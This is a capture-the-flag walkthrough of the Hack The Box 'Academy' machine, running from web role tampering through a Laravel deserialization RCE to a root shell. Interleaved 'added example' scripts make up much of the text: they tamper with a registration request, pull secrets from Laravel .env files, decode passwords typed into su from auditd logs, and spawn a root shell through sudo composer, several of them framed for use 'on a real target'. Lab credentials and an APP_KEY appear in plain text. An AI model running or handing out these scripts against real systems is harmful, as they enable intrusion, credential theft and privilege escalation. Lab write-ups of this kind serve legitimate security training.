
Academy ~ Hack The Box

Published
4 min read

All things Information Security!


Prerequisite


To make life easier, I usually add an entry to my hosts file so the target can be reached by name instead of by IP:

echo "10.10.10.215 academy.htb" >> /etc/hosts

hosts file entry


Okay now onto the hacking!


Reconnaissance

As always, I started with an Nmap scan of the machine, all TCP ports, with default scripts and version detection:

nmap -Pn -sC -sV -A -p- -oN initial academy.htb

┌──(root💀kali)-[/home/…/boxes/htb/machines/academy]
└─# nmap -Pn -sC -sV -A -p- -oN initial academy.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 16:54 EST
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.0037s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|     HY000

Scanning & Enumeration

The scan showed three open ports: SSH on 22, Apache 2.4.41 on 80 and MySQL's X protocol on 33060. Port 80 was the obvious place to start; the web app served there had a login page and a register page.


While registering, I noticed that the registration request carried a roleid parameter, set to 0 by default, even though the form never asked me for a role.


Initial enumeration also turned up an admin.php page. Browsing to admin.php just presented another login form.


I could not log in to that page with the account I had created through the register page.

Exploitation

The first thing I tried was to intercept my registration request and change roleid from 0 to 1. The server trusted the client-supplied value, so the new account was created with the admin role and I could log in to admin.php. This is a textbook hidden-parameter / mass-assignment bug: the role must be assigned server-side, never read from the request.
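The tamper-and-replay step above as a small repeatable script. This is an added example, not the author's own tooling: it assumes the form posts to /register.php with a urlencoded body whose fields are uname, passwd, confirm and roleid (the page only confirms roleid and admin.php; the rest is an assumption to adjust to what your proxy captured).

```shell
#!/bin/sh
# Added example (not from the original write-up): replay an intercepted
# registration request with the hidden roleid parameter flipped to 1.
# Assumptions (not stated on the page): the form posts to /register.php and
# the body is application/x-www-form-urlencoded with fields uname, passwd,
# confirm and roleid. Adjust to what your proxy actually captured.

# Rewrite roleid=<anything> to roleid=1 in a urlencoded body. Anchoring on
# start-of-string or '&' keeps it from touching a field like "xroleid".
tamper_roleid() {
  printf '%s' "$1" | sed -e 's/^roleid=[^&]*/roleid=1/' -e 's/&roleid=[^&]*/\&roleid=1/g'
}

# Send the tampered body and print the HTTP status so the result is visible.
register_as_admin() {
  base="$1"; body="$2"
  curl -s -o /dev/null -w '%{http_code}\n' \
    -X POST "$base/register.php" \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    --data "$(tamper_roleid "$body")"
}

# Usage against the target (intercepted body pasted as the second argument):
#   register_as_admin http://academy.htb 'uname=evil&passwd=Passw0rd&confirm=Passw0rd&roleid=0'
```

After registering, log in at admin.php with the new account; if the role is assigned server-side the status code will look the same but the login will still fail, which is exactly the check that tells you whether the bug is present.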


From the admin panel I gathered a couple of useful leads:

  • Possible user accounts = cry0l1t3 & mrb3n
  • Possible staging server = dev-staging-01.academy.htb

Next I added a hosts entry for the newly found name, since no DNS server resolved it to the target IP (Apache serves it as a name-based virtual host, so the Host header has to match):

echo "10.10.10.215 dev-staging-01.academy.htb" >> /etc/hosts

hosts file entry


Browsing to the staging vhost revealed that the app was built on Laravel. A couple of Google searches turned up a PoC for CVE-2018-15133, a deserialization bug in Laravel's handling of the encrypted X-XSRF-TOKEN that gives remote code execution to anyone who holds the application's APP_KEY (the base64 key passed as the second argument below):

┌──(root💀kali)-[/home/…/htb/machines/academy/exploit_laravel_cve-2018-15133]
└─# python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive


That gave me a reverse shell on the target machine :)

Lateral Movement

I knew the target was running Laravel, so I went looking for the configuration files a default Laravel install ships with.

Laravel reads its runtime configuration from a .env file in the application root: APP_KEY, database credentials, mail and cache settings are all declared there, which makes it the first file to read on any Laravel box.

I used find to locate them:

find / -name "*.env"


The file contained a set of credentials. Since passwords get reused, I tried them over SSH against the user names found earlier.
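The .env hunt from the last few steps, written up as a script that finds the files and pulls out only the secret-bearing keys, including the APP_KEY that the CVE-2018-15133 PoC above consumed. This is an added example, not the write-up's own commands. The sample .env it builds is constructed for the demo: the APP_KEY is the value from the exploit command on this page, the path and the database values are placeholders, not what the box actually held.

```shell
#!/bin/sh
# Added example (not the write-up's own commands): find Laravel .env files and
# pull the secrets out of them. The sample .env below is constructed for the
# demo; the APP_KEY is the one passed to the PoC above, everything else is a
# placeholder.

# Find .env files under a root, quietly. 2>/dev/null hides the permission
# errors that flood the output when running as www-data.
find_env_files() {
  find "$1" -type f -name '.env' 2>/dev/null
}

# Print KEY=VALUE for the keys that usually carry secrets. Strips a surrounding
# pair of quotes (KEY="value" / KEY='value') and skips comments and other keys.
env_secrets() {
  grep -E '^(APP_KEY|DB_(USERNAME|PASSWORD|HOST)|MAIL_PASSWORD|REDIS_PASSWORD|AWS_SECRET_ACCESS_KEY)=' "$1" \
    | sed -e "s/^\([A-Z_]*\)=[\"']\(.*\)[\"']\$/\1=\2/"
}

# Laravel stores the key as "base64:<key>"; the PoC wants only the base64 part.
app_key() {
  env_secrets "$1" | sed -n 's/^APP_KEY=base64://p'
}

# --- constructed sample, standing in for a real find hit ---
DEMO=$(mktemp -d)
mkdir -p "$DEMO/var/www/html/app"
cat > "$DEMO/var/www/html/app/.env" <<'EOF'
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=true
# database (placeholder values)
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_USERNAME=dev
DB_PASSWORD="example-password"
EOF

for f in $(find_env_files "$DEMO"); do
  echo "== $f"
  env_secrets "$f"
  echo "APP_KEY for the PoC: $(app_key "$f")"
done
```

On a real target run `find_env_files /` and feed each hit to `env_secrets`; the DB_PASSWORD is the value to spray over SSH against the user names collected from the admin panel, and a leaked APP_KEY on its own is enough for the deserialization RCE, which is why APP_DEBUG=true pages that dump the environment are so dangerous.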


Successful Lateral Movement

They worked for one of the two accounts (cry0l1t3), which got me the user flag.

That account had no sudo privileges, though, so I needed to move to the other user I had uncovered earlier.


At that point I had exhausted my manual enumeration and turned to LinPEAS for help.

I spun up a Python HTTP server, transferred LinPEAS to the target and ran it.


Thankfully, LinPEAS dug through the logs for me and showed that the other user I had found earlier was real. It also turned up that user's password:

mrb3n:mrb3n_Ac@d3my!
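What LinPEAS did here, done by hand, as an added example rather than anything from the write-up. The page only says the password came out of "the logs"; this script assumes the common Linux case where auditd TTY logging (pam_tty_audit) recorded what someone typed into su or sudo as a hex-encoded data= field in /var/log/audit/audit.log. The audit records below are constructed for the demo, and the hex decoder is pure awk so it works on a box without xxd or perl.

```shell
#!/bin/sh
# Added example (not part of the write-up): recover operator keystrokes from
# auditd TTY records. Assumption: pam_tty_audit was enabled, so a password
# typed into su/sudo sits in /var/log/audit/audit.log as data=<hex>.
# The log lines further down are constructed for the demo.

# Decode a hex string to text in pure awk (no xxd/perl needed on the target).
hex2str() {
  printf '%s' "$1" | awk '
    BEGIN { h = "0123456789abcdef" }
    { s = tolower($0)
      for (i = 1; i <= length(s); i += 2)
        printf "%c", (index(h, substr(s, i, 1)) - 1) * 16 + index(h, substr(s, i + 1, 1)) - 1
    }'
}

# For every type=TTY record in FILE print "<comm> uid=<uid>: <decoded keys>".
# The trailing carriage return (the Enter key) is stripped.
tty_keystrokes() {
  grep '^type=TTY ' "$1" | while IFS= read -r line; do
    comm=$(printf '%s' "$line" | sed -n 's/.*comm="\([^"]*\)".*/\1/p')
    uid=$(printf '%s' "$line" | sed -n 's/.* uid=\([0-9]*\).*/\1/p')
    data=$(printf '%s' "$line" | sed -n 's/.*data=\([0-9A-Fa-f]*\).*/\1/p')
    printf '%s uid=%s: %s\n' "$comm" "$uid" "$(hex2str "$data" | tr -d '\r')"
  done
}

# --- constructed sample log (two records: a PAM auth event and the TTY data) ---
AUDIT=$(mktemp)
cat > "$AUDIT" <<'EOF'
type=USER_AUTH msg=audit(1597199290.000:83): pid=2519 uid=1002 auid=1002 ses=6 msg='op=PAM:authentication acct="mrb3n" exe="/usr/bin/su" hostname=? addr=? terminal=/dev/pts/0 res=success'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=1002 ses=6 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210D
EOF

tty_keystrokes "$AUDIT"
# On a real box: tty_keystrokes /var/log/audit/audit.log (needs read access;
# the log is often group-readable by adm, which is the misconfiguration).
```

The check worth doing before celebrating: the record's comm tells you which program consumed the keystrokes and the neighbouring USER_AUTH record tells you which account it was for, so `su` plus `acct="mrb3n"` means the decoded string is mrb3n's password, not the typing user's.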


Privilege Escalation

Privilege escalation from this last user was straightforward: sudo -l showed that mrb3n was allowed to run composer as root.


Thankfully, GTFOBins has an entry for composer!
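The GTFOBins composer technique, wrapped up with the sudo check that belongs in front of it. This is an added example, not the author's own commands: composer's run-script executes whatever the "scripts" section of a composer.json says, so a composer.json we control plus "sudo composer" is a root shell. The 0<&3 1>&3 2>&3 redirections come straight from the GTFOBins recipe and are what keeps the shell interactive instead of having its I/O swallowed by composer's script runner.

```shell
#!/bin/sh
# Added example (GTFOBins composer technique, not the write-up's own commands).
# Requires a sudo rule that lets the current user run composer as root.

# Confirm the rule first. sudo -l may prompt for the user's own password;
# exit status 0 means a composer rule was listed.
composer_sudo_allowed() {
  sudo -l 2>/dev/null | grep -E '[^ ]*/composer|[[:space:]]composer([[:space:]]|$)'
}

# Stage a throw-away project whose only script spawns a shell, and print its path.
stage_composer_payload() {
  tf=$(mktemp -d)
  printf '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}\n' > "$tf/composer.json"
  printf '%s\n' "$tf"
}

# Run the staged script as root. Only meaningful on the target.
composer_root_shell() {
  composer_sudo_allowed >/dev/null || { echo "no sudo rule for composer" >&2; return 1; }
  tf=$(stage_composer_payload)
  sudo composer --working-dir="$tf" run-script x
}

# Usage on the box:  composer_root_shell
```

If sudo restricts the command to a specific path (for instance /usr/bin/composer), call it with that exact path; the --working-dir flag is what lets you point composer at your own composer.json without touching the project it was meant to manage.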


ROOTY!